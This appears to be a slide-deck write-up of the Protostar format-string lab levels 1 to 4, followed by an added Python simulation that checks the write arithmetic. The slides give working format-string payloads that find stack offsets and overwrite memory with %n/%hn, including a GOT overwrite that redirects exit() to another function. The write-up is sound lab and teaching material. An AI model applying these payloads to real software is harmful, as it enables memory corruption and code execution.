
Tachikoma 2013-01


  1. Tachikoma, January (Monday, January 28, 13)
  2. Menu • Fusion lv.02, 03, 04 • 5 minutes python
  4. WTF!?
  6. Menu • Protostar format lv.01, 02, 03, 04 • 5 minutes python
  7. Menu • Protostar format lv.01, 02, 03, 04 • I'm doing more than planned, so please forgive me… • 5 minutes python • import "university assignment"
  8. Protostar format 1
  9. Protostar format 1 • Overwriting the int target is enough • In C, global variables are zero-initialized • Goal: make it anything other than 0
  10. Protostar format 1 • Looks like you just have to vary argv[1] • Find how far you have to pop before it shows up • An int is 4 bytes • AAAA%x.... • Couldn't find it by hand…
  11. Protostar format 1
  12. Protostar format 1 • Around 132? • printf("AAAA%132$x", <- same arguments as before); • is apparently what it amounts to?
  13. Protostar format 1 • Let's use %n to overwrite it • ./format1 `python -c 'print "\x38\x96\x04\x08xx%132$n"'` • 8xx you have modified the target :)
  14. Protostar format 2
  15. Protostar format 2 • Changes • input comes from stdin instead of argv • target apparently has to become 64
  16. Protostar format 2 • Pop and search as in 1 • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2 • AAAA200,b7fd8420,bffff564,41414141 • target is 0 :( • This time 4 is enough
  17. Protostar format 2 • Address of target • user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target • 080496e4 g O .bss 00000004 target • Try it the same way as in 1 • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%4$n"' | ./format2 • ? • target is 4 :(
  18. Protostar format 2 • target became 4! • %n is the number of characters written so far! • Try it • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08x%4$n"' | ./format2 • x • target is 5 :(
  19. Protostar format 2 • Try once more • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08xx%4$n"' | ./format2 • xx • target is 6 :( • and 64-4=60, so… • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08" + "x"*60 + "%4$n"' | ./format2 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx • you have modified the target :)
  20. Protostar format 3
  21. Protostar format 3 • Changes • printf() is not called directly; it goes through printbuffer(char *) • A lot has to be written
  22. Protostar format 3 • First, try the same thing as before • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3 • AAAAxx0,bffff520,b7fd7ff4,0 • target is 00000000 :(
  23. Protostar format 3 • Very well then, Python it is • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx,0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( • It was the 12th
  26. Protostar format 3 • Address of target • user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target • 080496f4 g O .bss 00000004 target
  27. Protostar format 3 • Try it • python -c 'print "\xf4\x96\x04\x08" + "x"*256 + "%12$n"' | ./format3 • xxxxxxxxxxxxxxxxxxxxx(snip) • target is 00000104 :( • Doesn't work
  28. Protostar format 3 • It's multi-byte! • Just do the same calculation for each byte!
  29. • Try it • python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08%12$n%13$n%14$n"' | ./format3 • ? • target is 000c0c0c :(
  30. • Add various amounts of padding • python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n"' | ./format3 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx(snip) • you have modified the target :)
  31. Protostar format 4
  32. Protostar format 4 • Changes • overwrite the GOT instead of target • Goal • call hello()
  33. Protostar format 4 • Address of hello • # objdump -d ./format4 | grep hello [/opt/protostar/bin] • 080484b4 <hello>:
  34. Protostar format 4 • pop, pop, pop... • python -c 'print "AAAA" + ",%x"*4' | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 • It was the 4th
  37. Protostar format 4 • Plan • make it so that when exit() is called, hello() runs instead
  38. Protostar format 4 • objdump -R ./format4 | grep exit • 08049718 R_386_JUMP_SLOT _exit • 08049724 R_386_JUMP_SLOT exit
  39. Protostar format 4 • So we just have to overwrite 0x08049724 with hello()… • python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4 • [1] 4950 done python -c | • 4951 segmentation fault ./format4 • Did you mean: input too long
  40. Protostar format 4 • Google("help me"); • %nd (n any integer) pads the output out, right • Apparently that's how you normally pad out n bytes…
  41. Protostar format 4 • Try once more • python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn"' | ./format4 • $ %xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx(snip) • code execution redirected! you win
  42. Protostar format 4 • Somehow, it worked.
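As an added example that is not part of the slides, the Python 3 model below replays the %n/%hn character counts from slides 29, 30 and 39 to 41 against a small byte buffer, to show why the byte-by-byte padding yields 000c0c0c, then 01025544, and 080484b4 in the exit GOT slot. The addresses and pad lengths are the ones on the slides; the helper names are assumptions of this example.

```python
# Added example (not from the slides): a model of how %n / %hn writes land in
# memory, used to check the byte-wise arithmetic of slides 29, 30 and 39-41.
# Nothing here touches a real process; it only replays the counts.

def running_counts(prefix_len, pads):
    """Characters printf has emitted when each %n / %hn is reached.

    prefix_len: bytes printed before the first conversion (the raw addresses),
    pads: padding inserted before each successive conversion.
    """
    counts, total = [], prefix_len
    for pad in pads:
        total += pad
        counts.append(total)
    return counts


def simulate_writes(base, addrs, counts, size, mem_size=8):
    """Apply %n (size=4) or %hn (size=2) writes to a little-endian buffer.

    The buffer models `mem_size` bytes starting at `base`; bytes that fall
    outside it are dropped, which in the real binary would mean clobbering
    whatever follows the target.  Returns the 4-byte value stored at `base`.
    """
    mem = bytearray(mem_size)
    for addr, count in zip(addrs, counts):
        # %n stores the count as an int; %hn truncates it to a short.
        data = (count & ((1 << (8 * size)) - 1)).to_bytes(size, "little")
        for i, b in enumerate(data):
            off = addr - base + i
            if 0 <= off < mem_size:
                mem[off] = b
    return int.from_bytes(mem[:4], "little")


# Slide 29: three addresses, no padding -> every %n stores 12 (0x0c).
TARGET3 = 0x080496F4
no_pad = simulate_writes(TARGET3, [TARGET3, TARGET3 + 1, TARGET3 + 2],
                         running_counts(12, [0, 0, 0]), size=4)
# Slide 30: 56/17/173 x's give counts 68, 85, 258 -> 0x44, 0x55, 0x0102;
# the 0x01 of the last write carries into the top byte.
padded = simulate_writes(TARGET3, [TARGET3, TARGET3 + 1, TARGET3 + 2],
                         running_counts(12, [56, 17, 173]), size=4)
# Slides 39-41: %hn into the GOT slot of exit at 0x08049724 (+0, +1, +3).
GOT_EXIT = 0x08049724
redirected = simulate_writes(GOT_EXIT, [GOT_EXIT, GOT_EXIT + 1, GOT_EXIT + 3],
                             running_counts(12, [168, 976, 132]), size=2)

if __name__ == "__main__":
    print(f"slide 29: target is {no_pad:08x}")         # 000c0c0c
    print(f"slide 30: target is {padded:08x}")         # 01025544
    print(f"slide 41: exit slot -> {redirected:08x}")  # 080484b4 (hello)
```

The model also makes the side effect visible: the last %hn at +3 stores 0x05 one byte past the exit slot, so a write like this is never confined to its target.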
